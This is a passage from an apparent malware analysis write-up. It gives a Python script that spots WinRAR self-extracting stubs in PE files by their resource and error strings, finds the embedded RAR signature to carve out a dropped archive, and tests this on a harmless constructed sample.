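names in a PE image and locate the embedded RAR archive that follows the stub.
"""
from typing import Dict, List

# Identifiers recovered from the function analysis above. PE resource names are
# stored as UTF-16, so both narrow and wide encodings are searched.
SFX_MARKERS = (
    "GETPASSWORD1",
    "RENAMEDLG",
    "REPLACEFILEDLG",
    "RarHtmlClassName",
    "CryptProtectMemory failed",
    "CryptUnprotectMemory failed",
)

# Documented archive signatures: RAR 1.5 to 4.x, then RAR 5.0.
RAR_MAGICS = (b"Rar!\x1a\x07\x00", b"Rar!\x1a\x07\x01\x00")


def find_markers(data: bytes) -> Dict[str, List[int]]:
    """Return every marker present, with the offsets of all its occurrences."""
    hits: Dict[str, List[int]] = {}
    for marker in SFX_MARKERS:
        offsets: List[int] = []
        for encoding in ("ascii", "utf-16-le"):
            needle = marker.encode(encoding)
            pos = data.find(needle)
            while pos != -1:
                offsets.append(pos)
                pos = data.find(needle, pos + 1)
        if offsets:
            hits[marker] = sorted(offsets)
    return hits


def rar_signature_offset(data: bytes) -> int:
    """Offset of the first RAR archive signature, or -1 when none is embedded."""
    found = [pos for pos in (data.find(m) for m in RAR_MAGICS) if pos != -1]
    return min(found) if found else -1


def looks_like_rar_sfx(data: bytes, min_markers: int = 3) -> bool:
    """Heuristic (assumed threshold): several stub markers plus an embedded archive."""
    return len(find_markers(data)) >= min_markers and rar_signature_offset(data) != -1


def build_sample() -> bytes:
    """Constructed stand-in for a real SFX, used only to exercise the checks:
    a DOS-header-sized prefix, the wide-string markers, one narrow message,
    then a RAR5 signature followed by padding where archive blocks would sit."""
    stub = b"MZ" + b"\x00" * 62
    for name in ("GETPASSWORD1", "RENAMEDLG", "REPLACEFILEDLG", "RarHtmlClassName"):
        stub += name.encode("utf-16-le") + b"\x00\x00"
    stub += b"CryptProtectMemory failed\x00"
    return stub + b"\x00" * 16 + RAR_MAGICS[1] + b"\x00" * 8


if __name__ == "__main__":
    sample = build_sample()
    for marker, offsets in find_markers(sample).items():
        print(f"{marker:>28} at {[hex(o) for o in offsets]}")
    print("RAR header at", hex(rar_signature_offset(sample)))
    print("SFX verdict:", looks_like_rar_sfx(sample))
```

    On a real sample, read the file bytes and pass them to looks_like_rar_sfx; the offset returned by rar_signature_offset is where to carve the archive for listing with a RAR tool, which is the quicker route to the dropped .lnk than waiting for extraction in a sandbox.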